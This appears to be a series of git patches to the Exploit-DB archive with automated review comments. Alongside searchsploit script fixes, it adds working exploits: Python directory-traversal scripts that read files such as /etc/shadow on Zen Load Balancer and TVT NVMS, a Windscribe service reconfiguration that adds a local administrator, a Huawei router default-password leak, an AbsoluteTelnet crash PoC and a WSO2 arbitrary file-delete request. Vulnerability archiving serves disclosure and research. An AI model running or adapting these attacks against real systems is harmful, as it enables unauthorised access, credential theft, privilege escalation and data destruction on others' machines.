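Review bot: The code does not demonstrate a CSRF-protection bypass: `bypass()` fetches the login page inside a `Session`, reads `csrfmiddlewaretoken` from the form and the cookies from that same response, and posts both back to the same origin, which is exactly how a legitimate same-site client is meant to submit a Django form; a cross-origin attacker cannot read either value because of the same-origin policy, and nothing in the file shows otherwise (if the authors have a further argument it is not in this hunk). The title and the `# Version: 3.0 =<` claim therefore overstate what is shown, and the header should either name the actual weakness or say `# Note: replays the per-session CSRF token obtained from the login page; does not defeat Django's CSRF check for a cross-origin attacker`. Separately, `soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']` raises `TypeError` when the page has no such input, so fetch it into a variable and `return` with a message when it is `None`.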
@@ -42545,3 +42545,5 @@ id,file,description,date,author,type,platform,port 48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php, 48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, +48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, +48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware, From 37ed20a3b9bcfc7070f21de023c3e3d294f48207 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Thu, 9 Apr 2020 12:10:00 +0100 Subject: [PATCH 05/18] Fix a few grammar mistakes --- searchsploit | 39 +++++++++++++++++++++++---------------- 1 file changed, 23 insertions(+), 16 deletions(-) diff --git a/searchsploit b/searchsploit index 07e505173..895aca470 100755 --- a/searchsploit +++ b/searchsploit @@ -1,6 +1,6 @@ #!/bin/bash # Name: SearchSploit - Exploit-DB's CLI search tool -# Version: 4.0.6 (2020-04-06) +# Version: 4.0.7 (2020-04-09) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k # Homepage: https://github.com/offensive-security/exploitdb # Manual: https://www.exploit-db.com/searchsploit @@ -264,7 +264,7 @@ function validterm() || [ "$( echo ${1} | tr '[:upper:]' '[:lower:]' )" == "oracle" ] \ || [ "$( echo ${1} | tr '[:upper:]' '[:lower:]' )" == "ssh" ] \ || [ "$( echo ${1} | tr '[:upper:]' '[:lower:]' )" == "unknown" ]; then - echo -e "[-] Skipping term: ${1} (Term is too general. Please re-search manually: $0 ${arg} ${1})\n" 1>&2 + echo -e "[-] Skipping term: ${1} (Too generic. You'll need to force a search: $0 ${arg} ${1})\n" 1>&2 ## Issues, return with something return 1 fi 
@@ -299,7 +299,7 @@ function searchsploitout() tmp="" for word in $( echo ${software} ); do ## Add current search term on - tmp="${tmp}${word} " + tmp="${tmp}${word}" ## Check to see if its any phrases which would give a TON of incorrect results validterm "${tmp}" \ @@ -312,14 +312,18 @@ function searchsploitout() ## Are there too many result? lines=$( echo -e "${out}" | wc -l ) if [[ "${lines}" -gt 100 ]]; then - echo -e "[-] Skipping output: ${tmp} (Too many results. Please re-search manually: $0 ${arg} ${tmp})\n" 1>&2 + echo -e "[-] Skipping output: ${tmp} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${tmp})\n" 1>&2 ## Are there any result? elif [[ "${lines}" -gt 5 ]]; then echo -e "${out}\n\n" ## If there's no results else + ## Exit for loop break fi + + ## Space out for the next word + tmp="${tmp} " done ## Padding between loops @@ -336,7 +340,7 @@ function searchsploitout() ## Are there too many result? lines=$( echo -e "${out}" | wc -l ) if [[ "${lines}" -gt 100 ]]; then - echo -e "[-] Skipping output: ${software} (Too many results. Please re-search manually: $0 ${arg} ${software})\n" 1>&2 + echo -e "[-] Skipping output: ${software} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${software})\n" 1>&2 ## Are there any result? elif [[ "${lines}" -gt 5 ]]; then echo -e "${out}\n\n" @@ -492,8 +496,9 @@ function findresults() ## Maximum length COL2 can be FORMAT_COL2=$(( ${COL2} - 2 )) - ## Strip un-wanted values - SEARCH="${SEARCH} | sed 's/\"//g'" + ## Strip un-wanted values from titles + #SEARCH="${SEARCH} | sed 's/\"//g" + SEARCH="${SEARCH} | sed 's/,\"/,/; s/\"$//;'" ## Remove any terms not wanted from the search @@ -532,9 +537,11 @@ function findresults() | sort )" ## Default view else + echo $SEARCH OUTPUT="$( eval ${SEARCH} \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort )" + #| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ fi 
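Review bot: The new `sed 's/,\"/,/; s/\"$//;'` only unquotes the title correctly if, by this point in `${SEARCH}`, each line already ends with the title field: without a `g` flag the first substitution touches only the first `,"` and the second only a quote at end of line, so on a full files_exploits.csv record the title's closing quote (and the quoted author field) would survive into the awk `$3` column. The head of the `${SEARCH}` pipeline and the start of `findresults()` are outside the hunk, so if an earlier stage cuts records down to id,file,"title" this is fine and the comment should say so, e.g. `## Strip the quotes around the title only (lines are id,file,"title" at this point)`; otherwise `sed 's/,\"/,/g; s/\",/,/g'` would unquote every quoted field regardless of what follows it.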
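Review bot: `echo $SEARCH` in the default-view `else` branch prints the assembled search pipeline to stdout before the results, so every plain search now shows the internal command above its output; it reads as leftover debugging and should be dropped, together with the commented-out `#| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \` line, which is dead code placed after the closing `| sort )"` and cannot be re-enabled as written. The enclosing `findresults()` starts outside the hunk.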
@@ -550,7 +557,7 @@ function printresults() { title_in="${1}" path_in="${2}" - json_title="$(echo ${title_in} | tr /a-z/ /A-Z/)" + json_title="$( echo ${title_in} | tr /a-z/ /A-Z/ )" ## Print header if in JSON ("--json") @@ -709,16 +716,16 @@ for (( i=0; i<${arraylength}; i++ )); do if [[ -f "${files}" ]]; then continue ## Method #1 - File itself - elif [[ -f "$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/${files_array[${i}]}" ]]; then - echo "[i] Found (#1): $(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/${files_array[${i}]}" + elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}" ]]; then + echo "[i] Found (#1): $( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}" echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})" - path_array[${i}]="$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)" + path_array[${i}]="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" echo ## Method #2 - Symbolic link - elif [[ -f "$(dirname "$(readlink "$0")")/${files_array[${i}]}" ]]; then - echo "[i] Found (#2): $(dirname "$(readlink "$0")")/${files_array[${i}]}" + elif [[ -f "$( dirname "$( readlink "$0" )" )/${files_array[${i}]}" ]]; then + echo "[i] Found (#2): $( dirname "$( readlink "$0" )" )/${files_array[${i}]}" echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})" - path_array[${i}]="$(dirname "$(readlink "$0")")" + path_array[${i}]="$( dirname "$( readlink "$0" )" )" echo else #echo "[!] Could not find: ${files}" @@ -804,7 +811,7 @@ if [[ "${GETPATH}" -eq 1 ]]; then title=$( grep -m 1 "${path}" "${files}" | cut -d ',' -f 3 | sed 's/"//g' ) ## File type - fileinfo="$(file -b "${location}")" + fileinfo="$( file -b "${location}" )" ## How long is the name? PADDING=$(( 9 - ${#name} )) 
@@ -904,7 +911,7 @@ for (( i=0; i<${arraylength}; i++ )); do printresults "${name_array[${i}]}" "${path_array[${i}]}" ## Summary if NOT JSON ("--json") elif [[ "${JSON}" -eq 0 ]]; then - echo "${name_array[${i}]}s: No Result" + echo "${name_array[${i}]}s: No Results" fi ## Reset COLOUR_TAG="" From 0f8df71e728a17276d17a68c340f1a76879e5612 Mon Sep 17 00:00:00 2001 From: g0tmi1k <535942+g0tmi1k@users.noreply.github.com> Date: Thu, 9 Apr 2020 12:22:20 +0100 Subject: [PATCH 06/18] Remove debug command Remove debug command --- searchsploit | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/searchsploit b/searchsploit index 00d7c519b..4de856bf8 100755 --- a/searchsploit +++ b/searchsploit @@ -1,4 +1,4 @@ -#!/bin/bash +ech#!/bin/bash # Name: SearchSploit - Exploit-DB's CLI search tool # Version: 4.0.7 (2020-04-09) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k @@ -538,7 +538,6 @@ function findresults() | sort )" ## Default view else - echo $SEARCH OUTPUT="$( eval ${SEARCH} \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort )" From 4ee0ce31e79e35784c8556e6e44b402cbc2dab3c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 11 Apr 2020 05:01:50 +0000 Subject: [PATCH 07/18] DB: 2020-04-11 3 changes to exploits/shellcodes AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) Windscribe 1.83 - 'WindscribeService' Unquoted Service Path Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal --- exploits/cgi/webapps/48308.py | 31 +++++++++++++++++++ exploits/windows/dos/48305.py | 22 ++++++++++++++ exploits/windows/local/48306.txt | 52 ++++++++++++++++++++++++++++++++ files_exploits.csv | 3 ++ 4 files changed, 108 insertions(+) create mode 100755 exploits/cgi/webapps/48308.py create mode 100755 exploits/windows/dos/48305.py create mode 100644 exploits/windows/local/48306.txt 
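Review bot: The first line of searchsploit has become `ech#!/bin/bash`, which destroys the shebang: the kernel no longer execs the script with bash (a calling shell falls back to `/bin/sh`, where bash-only syntax such as the `[[ ]]` tests and arrays visible elsewhere in this file will fail), and once running, `ech#!/bin/bash` is parsed as a command name rather than a comment because the `#` is not preceded by whitespace. This looks like a stray keystroke from deleting the `echo $SEARCH` debug line that the commit otherwise removes; restore `#!/bin/bash`.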
diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py new file mode 100755 index 000000000..5ce0b9588 --- /dev/null +++ b/exploits/cgi/webapps/48308.py @@ -0,0 +1,31 @@ +# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal +# Date: 2020-04-10 +# Exploit Author: Basim Alabdullah +# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download +# Version: 3.10.1 +# Tested on: Debian8u2 +# +# Technical Details: +# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. +# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. +# Note that disclosure of the shadow file may allow an attacker to discover users' passwords +# +# Impact: +# -------- +# Successful exploitation could allow an attacker to obtain sensitive +# information. + +import requests +import sys + +if len(sys.argv) <2: + print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow") + sys.exit(-1) +else: + files=sys.argv[2] + url=sys.argv[1] + with requests.session() as s: + urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs" + response = s.get(urlz, auth=('admin', 'admin'), verify=False) + txt=response.text + print(response.text) \ No newline at end of file diff --git a/exploits/windows/dos/48305.py b/exploits/windows/dos/48305.py new file mode 100755 index 000000000..0771d435c --- /dev/null +++ b/exploits/windows/dos/48305.py 
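Review bot: The argument check `if len(sys.argv) <2:` lets a call with only the URL through, and `files=sys.argv[2]` then raises IndexError instead of printing the usage line; it should be `if len(sys.argv) < 3:`. The request is also sent with `auth=('admin', 'admin')`, so the traversal as shown needs valid (here default) credentials and the header/title should say so, e.g. `# Note: requires an authenticated session; the default admin/admin credentials are used below`. `verify=False` is reasonable against an appliance's self-signed certificate but deserves a one-line comment, and the unused `txt` variable can go.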
@@ -0,0 +1,22 @@ +# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-05-02 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe +# Tested Version: 11.12 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py +# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard +# 3.- Open AbsoluteTelnet +# 4.- Select "new connection file", "Connection", "SSH1", "Use last username" +# 5.- In "username" field paste Clipboard +# 6.- Select "OK" +# 7.- Crashed + +buffer = "\x41" * 1000 +f = open ("absolutetelnet_username_SSH1.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48306.txt b/exploits/windows/local/48306.txt new file mode 100644 index 000000000..5f1850679 --- /dev/null +++ b/exploits/windows/local/48306.txt 
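Review bot: `# Discovery Date: 2020-05-02` is later than the 2020-04-10 publication date this commit records for the same ID in files_exploits.csv and than the commit itself, so it is presumably a typo for 2020-04-02 and should be corrected. Step 1 of the reproduction refers to `AbsoluteTelnet 11.12_username_ssh1.py`, which is not the repository file name; point it at the actual script so the steps can be followed verbatim. Writing the payload with `with open("absolutetelnet_username_SSH1.txt", "w") as f: f.write(buffer)` would also close the file on error.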
@@ -0,0 +1,52 @@ +# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path +# Date: 2020-04-10 +# Exploit Author: MgThuraMoeMyint +# Vendor Homepage: https://windscribe.com +# Version: v1.83 Build 20 +# Tested on: Windows 10, version 1909 + +In windscribe v1.83 , there is a service via windscribe that every +authenticated user can modify. + +C:\Users\mgthura>sc qc WindscribeService +[SC] QueryServiceConfig SUCCESS +SERVICE_NAME: WindscribeService +TYPE : 10 WIN32_OWN_PROCESS +START_TYPE : 2 AUTO_START +ERROR_CONTROL : 1 NORMAL +BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe +LOAD_ORDER_GROUP : +TAG : 0 +DISPLAY_NAME : WindscribeService +DEPENDENCIES : +SERVICE_START_NAME : LocalSystem + +That shows that running as Local System this means that the +BINARY_PATH_NAME parameter can be modified to execute any command on +the system. +I'll change binary_path_name with a command that add a user to +administrators group , so it will be + +C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup +administrators pentest /add" +[SC] ChangeServiceConfig SUCCESS + +C:\Users\mgthura>sc stop WindscribeService + +SERVICE_NAME: WindscribeService +TYPE : 10 WIN32_OWN_PROCESS +STATE : 3 STOP_PENDING +(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) +WIN32_EXIT_CODE : 0 (0x0) +SERVICE_EXIT_CODE : 0 (0x0) +CHECKPOINT : 0x4 +WAIT_HINT : 0x0 + +C:\Users\mgthura>sc start WindscribeService +[SC] StartService FAILED 1053: +The service did not respond to the start or control request in a timely fashion. + +Restarting service will cause the service to fail as the binary path +would not point into the actual executable of the service. +However the command will be executed successfully and the user will be +added to the local administrators group. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 600baaeaa..558ffa2fb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
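Review bot: The write-up is titled "Unquoted Service Path", but what it demonstrates is a weak service ACL: the escalation shown is `sc config WindscribeService binPath= ...` succeeding from a user shell, which requires SERVICE_CHANGE_CONFIG on the service and does not depend on the spaces in the unquoted `C:\Program Files (x86)\Windscribe\WindscribeService.exe` path (an unquoted-path attack would instead need write access to `C:\` or `C:\Program Files (x86)\` to plant `C:\Program.exe` or `C:\Program Files.exe`, which is not shown). The claim that "every authenticated user can modify" the service is also unsupported in the text — include the output of `sc sdshow WindscribeService` or `accesschk -ucqv WindscribeService` run as the low-privileged account, and state which account ran the `sc config` command. A title such as "Windscribe 1.83 - 'WindscribeService' Insecure Service Permissions (Local Privilege Escalation)" would match the evidence.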
@@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port
 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
 48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
+48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port
 48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
+48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port
 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
+48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
From a2581bc29f906646f05bf71886425b0d7a8cb3d0 Mon Sep 17 00:00:00 2001
From: chenrui
Date: Sat, 11 Apr 2020 14:13:10 -0400
Subject: [PATCH 08/18] Fix bash script
---
searchsploit | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/searchsploit b/searchsploit
index 4de856bf8..75edc5ac2 100755
--- a/searchsploit
+++ b/searchsploit
@@ -1,4 +1,4 @@
-ech#!/bin/bash
+#!/bin/bash
 # Name: SearchSploit - Exploit-DB's CLI search tool
 # Version: 4.0.7 (2020-04-09)
 # Written by: Offensive Security, Unix-Ninja, and g0tmi1k
From be2aa5d840ffbdc0d72fbf7fc126f55cd32ed633 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 14 Apr 2020 05:01:51 +0000
Subject: [PATCH 09/18] DB: 2020-04-14
7 changes to exploits/shellcodes
Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
Huawei HG630 2 Router - Authentication Bypass
TVT NVMS 1000 - Directory Traversal
Webtateas 2.0 - Arbitrary File Read
WSO2 3.1.0 - Arbitrary File Delete
Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion
MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
---
exploits/hardware/webapps/48310.txt | 51 +++++
exploits/hardware/webapps/48311.py | 43 ++++
exploits/java/webapps/48313.txt | 146 +++++++++++++
exploits/php/webapps/48312.txt | 26 +++
exploits/php/webapps/48315.txt | 28 +++
exploits/php/webapps/48316.txt | 34 +++
exploits/windows/local/48314.py | 324 ++++++++++++++++++++++++++++
files_exploits.csv | 7 +
8 files changed, 659 insertions(+)
create mode 100644 exploits/hardware/webapps/48310.txt
create mode 100755 exploits/hardware/webapps/48311.py
create mode 100644 exploits/java/webapps/48313.txt
create mode 100644 exploits/php/webapps/48312.txt
create mode 100644 exploits/php/webapps/48315.txt
create mode 100644 exploits/php/webapps/48316.txt
create mode 100755 exploits/windows/local/48314.py
diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt
new file mode 100644
index 000000000..61e7d2b48
--- /dev/null
+++ b/exploits/hardware/webapps/48310.txt
@@ -0,0 +1,51 @@ +# Title: Huawei HG630 2 Router - Authentication Bypass +# Date: 2020-04-13 +# Author: Eslam Medhat +# Vendor Homepage: www.huawei.com +# Version: HG630 V2 +# HardwareVersion: VER.B +# CVE: N/A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: +SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Fri, 01 Jan 2010 09:14:47 GMT +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"HG630 +V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ + + +You can use that serial number to login to the router. + +#Reference: +https://www.youtube.com/watch?v=vOrIL7L_cVc \ No newline at end of file diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py new file mode 100755 index 000000000..18243acd7 --- /dev/null +++ b/exploits/hardware/webapps/48311.py 
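Review bot: The advisory never says whether `/api/system/deviceinfo` answers without a valid session, yet the PoC request carries a `SessionID_R3` cookie, so a reader cannot tell if the serial-number disclosure is reachable pre-authentication or only by an already logged-in user; that distinction decides whether this is really an authentication bypass and should be stated in the POC section. The request and response also reproduce what look like a complete session token and a complete device serial number from a real unit; a published record should mask them (for example `"SerialNumber":"T5D7S1881590XXXX"`). A one-line mitigation for defenders would also help, e.g. `# Mitigation: change the default admin password; the default is derived from a value the device discloses.`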
@@ -0,0 +1,43 @@ +# Exploit Title: TVT NVMS 1000 - Directory Traversal +# Date: 2020-04-13 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html +# Original Author : Numan Türle +# CVE : CVE-2019-20085 + +import sys +import requests +import os +import time + +if len(sys.argv) !=4: + print " " + print "Usage : python exploit.py url filename outputname" + print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" + print " " +else: + + + traversal = "../../../../../../../../../../../../../" + filename = sys.argv[2] + url = sys.argv[1]+traversal+filename + outputname = sys.argv[3] + content = requests.get(url) + + if content.status_code == 200: + + print " " + print "Directory Traversal Succeeded" + time.sleep(3) + print " " + print "Saving Output" + os.system("touch " + outputname) + output_write = open(outputname,"r+") + output_write.write(content.text) + output_write.close() + + else: + + print "Host not vulnerable to Directory Traversal!" \ No newline at end of file diff --git a/exploits/java/webapps/48313.txt b/exploits/java/webapps/48313.txt new file mode 100644 index 000000000..7ab57c008 --- /dev/null +++ b/exploits/java/webapps/48313.txt 
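Review bot: `os.system("touch " + outputname)` hands an unquoted argv value to a shell and is not needed, because opening the output file with mode `"w"` creates it; the three lines `os.system(...)`, `open(outputname,"r+")` and the manual `close()` collapse to `with open(outputname, "w") as fh: fh.write(content.text)`. Treating every HTTP 200 as "Directory Traversal Succeeded" will report false positives against servers that return 200 with an error body, so that condition deserves at least a comment saying the result must be inspected. The script is Python 2 only (bare `print` statements); the header should record that, e.g. `# Tested with: Python 2.7`.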
@@ -0,0 +1,146 @@ +# Title: WSO2 3.1.0 - Arbitrary File Delete +# Date: 2020-04-12 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A + + +Document Title: +=============== +WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) + + +##CVE not assigned yet + +##Security Update : https://apim.docs.wso2.com/en/latest/ + + +Common Vulnerability Scoring System: +==================================== +8.5 + + +Affected Product(s): +==================== +WSO2 API Manager Carbon Interface + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . +The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests +and to delete arbitrary System files. + +The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter +of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files +via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . + +The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. +Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. +Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. + +=============================== + +Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) 
+ +[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. +org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d +eployment\server\registryextensions\commons-dir + at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j +ava:531) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( +OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO +peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out +InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.client.OperationClient.execute(OperationClient.java: +149) ~[axis2_1.6.1.wso2v38.jar:?] + at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem +oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte +nsions.stub_4.7.13.jar:?] + at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. +deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens +ions.ui_4.7.13.jar:?] + at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS +ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] + at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t +omcat_9.0.22.wso2v1.jar:?] + +*Error displayed in Web browser with body request: + + + + + +============================= + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp + +Vulnerable Parameter(s): +[+] extensionName + + +Server version + 3.0.0 + + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. 
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) +2-attacker uploads any file .jar extension +3-attacker intercepts the request that follows and modifies the parameter with traversal string: + +--- PoC Session Logs [POST] --- + +POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 +Host: localhost:9443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS +Content-Length: 22 +Origin: https://localhost:9443 +Connection: close +Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu +Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; 